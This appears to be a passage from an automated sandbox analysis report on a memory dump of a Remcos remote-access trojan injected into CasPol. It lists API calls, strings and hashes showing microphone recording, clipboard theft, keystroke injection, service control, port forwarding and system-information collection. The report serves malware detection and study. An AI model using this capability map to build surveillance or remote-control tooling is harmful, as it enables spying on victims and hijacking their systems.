                                                                              • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                              • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                              • String ID:
                                                                              • API String ID: 221034970-0
                                                                              • Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                              • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                              • Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                              • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00446DDF
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                              • _free.LIBCMT ref: 00446DEB
                                                                              • _free.LIBCMT ref: 00446DF6
                                                                              • _free.LIBCMT ref: 00446E01
                                                                              • _free.LIBCMT ref: 00446E0C
                                                                              • _free.LIBCMT ref: 00446E17
                                                                              • _free.LIBCMT ref: 00446E22
                                                                              • _free.LIBCMT ref: 00446E2D
                                                                              • _free.LIBCMT ref: 00446E38
                                                                              • _free.LIBCMT ref: 00446E46
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                              • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                              • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                              • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Eventinet_ntoa
                                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                              • API String ID: 3578746661-4192532303
                                                                              • Opcode ID: 93b56b50c6284e550a43a0f4d176ee8c54a0e35d68ba35fb3dfbc6a65e3d81cd
                                                                              • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                              • Opcode Fuzzy Hash: 93b56b50c6284e550a43a0f4d176ee8c54a0e35d68ba35fb3dfbc6a65e3d81cd
                                                                              • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                              APIs
                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DecodePointer
                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                              • API String ID: 3527080286-3064271455
                                                                              • Opcode ID: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                              • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                              • Opcode Fuzzy Hash: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                              • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                              APIs
                                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                              • Sleep.KERNEL32(00000064), ref: 00416688
                                                                              • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                              • API String ID: 1462127192-2001430897
                                                                              • Opcode ID: 1feb9446bd49946b70c9c1d76ba489eb1351f7e3e19703becef35d5c604cd5d7
                                                                              • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                              • Opcode Fuzzy Hash: 1feb9446bd49946b70c9c1d76ba489eb1351f7e3e19703becef35d5c604cd5d7
                                                                              • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                              APIs
                                                                              • _strftime.LIBCMT ref: 00401AD3
                                                                                • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                              • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                              • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                              • API String ID: 3809562944-3643129801
                                                                              • Opcode ID: a0d4b68123ccb8690edebec149ad94aabf9f76f5131ed63dacbc39586bcb4aec
                                                                              • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                              • Opcode Fuzzy Hash: a0d4b68123ccb8690edebec149ad94aabf9f76f5131ed63dacbc39586bcb4aec
                                                                              • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                              APIs
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                              • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                              • waveInStart.WINMM ref: 00401A81
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                              • String ID: XCG$`=G$x=G
                                                                              • API String ID: 1356121797-903574159
                                                                              • Opcode ID: 2149f65fb90277673ca699f49e62636c353465791ca96c5fd76458555fc1766c
                                                                              • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                              • Opcode Fuzzy Hash: 2149f65fb90277673ca699f49e62636c353465791ca96c5fd76458555fc1766c
                                                                              • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                              • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                              • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                              • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                              • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                              • String ID: Remcos
                                                                              • API String ID: 1970332568-165870891
                                                                              • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                              • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                              • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                              • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                              • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                              • Opcode Fuzzy Hash: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                              • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                              APIs
                                                                              • GetCPInfo.KERNEL32(?,?), ref: 00452BD6
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C59
                                                                              • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CEC
                                                                              • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D03
                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D7F
                                                                              • __freea.LIBCMT ref: 00452DAA
                                                                              • __freea.LIBCMT ref: 00452DB6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                              • String ID:
                                                                              • API String ID: 201697637-0
                                                                              • Opcode ID: cde961f71f83e5614e0e0585355dc136788689c58c90c98609e3e8ecc25f0046
                                                                              • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                              • Opcode Fuzzy Hash: cde961f71f83e5614e0e0585355dc136788689c58c90c98609e3e8ecc25f0046
                                                                              • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                              • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                              • _free.LIBCMT ref: 00444714
                                                                              • _free.LIBCMT ref: 0044472D
                                                                              • _free.LIBCMT ref: 0044475F
                                                                              • _free.LIBCMT ref: 00444768
                                                                              • _free.LIBCMT ref: 00444774
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                              • String ID: C
                                                                              • API String ID: 1679612858-1037565863
                                                                              • Opcode ID: 073fed261fa285cd6c65459185357f93b396e03b6829dbcf8ce3010cb8f635a5
                                                                              • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                              • Opcode Fuzzy Hash: 073fed261fa285cd6c65459185357f93b396e03b6829dbcf8ce3010cb8f635a5
                                                                              • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tcp$udp
                                                                              • API String ID: 0-3725065008
                                                                              • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                              • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                              • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                              • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID: gKE$HE$HE
                                                                              • API String ID: 269201875-2777690135
                                                                              • Opcode ID: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                              • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                              • Opcode Fuzzy Hash: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                              • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                              APIs
                                                                              • ExitThread.KERNEL32 ref: 004017F4
                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                              • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                              • String ID: T=G$p[G$>G$>G
                                                                              • API String ID: 1596592924-2461731529
                                                                              • Opcode ID: 17534cbbce1471fe965db1e4a040205c2d4f2d5752a0d8f67121475e772d8bd4
                                                                              • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                              • Opcode Fuzzy Hash: 17534cbbce1471fe965db1e4a040205c2d4f2d5752a0d8f67121475e772d8bd4
                                                                              • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                              • String ID: .part
                                                                              • API String ID: 1303771098-3499674018
                                                                              • Opcode ID: 54257d622aa63ad30bb645e20e598f32bbf93e15d75ec557b2562d4f49382a3f
                                                                              • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                              • Opcode Fuzzy Hash: 54257d622aa63ad30bb645e20e598f32bbf93e15d75ec557b2562d4f49382a3f
                                                                              • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                              APIs
                                                                                • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                              • _wcslen.LIBCMT ref: 0041A8F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                              • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                              • API String ID: 37874593-703403762
                                                                              • Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                              • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                              • Opcode Fuzzy Hash: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                              • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                              • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                              • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                              • __freea.LIBCMT ref: 00449B37
                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              • __freea.LIBCMT ref: 00449B40
                                                                              • __freea.LIBCMT ref: 00449B65
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 3864826663-0
                                                                              • Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                              • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                              • Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                              • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                              APIs
                                                                              • SendInput.USER32 ref: 00418B08
                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InputSend$Virtual
                                                                              • String ID:
                                                                              • API String ID: 1167301434-0
                                                                              • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                              • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                              • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                              • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                              APIs
                                                                              • OpenClipboard.USER32 ref: 00415A46
                                                                              • EmptyClipboard.USER32 ref: 00415A54
                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                              • String ID:
                                                                              • API String ID: 2172192267-0
                                                                              • Opcode ID: 1cf21b3c78c89055b472f434a5839017756ad295560214288860051956d88cc3
                                                                              • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                              • Opcode Fuzzy Hash: 1cf21b3c78c89055b472f434a5839017756ad295560214288860051956d88cc3
                                                                              • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID:
                                                                              • API String ID: 269201875-0
                                                                              • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                              • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
